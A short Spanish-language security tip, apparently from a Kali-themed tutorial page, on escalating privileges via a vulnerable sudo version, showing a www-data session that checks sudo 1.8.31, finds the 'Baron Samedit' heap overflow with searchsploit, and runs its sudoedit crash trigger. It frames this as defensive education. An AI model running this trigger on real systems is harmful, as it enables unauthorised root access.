KALI
Privesc por versión de sudo
A veces la escalada no está en la configuración, sino en un fallo del propio sudo.
Revisa la versión con sudo menos V, y compárala con vulnerabilidades conocidas. Por ejemplo, versiones viejas fueron afectadas por fallos famosos que dan root incluso sin permisos sudo.
Con searchsploit buscas el exploit para esa versión exacta. Mantener sudo actualizado no es opcional.
La versión que corres importa tanto como cómo lo configuras.
# los comandos
www-data@victim:$ sudo --version | head -1copiarSudo version 1.8.31
www-data@victim:$ searchsploit sudo 1.8copiarSudo 1.8.x - 'Baron Samedit' Heap Overflow | linux/local/...
www-data@victim:$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')copiar(si vulnerable, corrupción -> root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.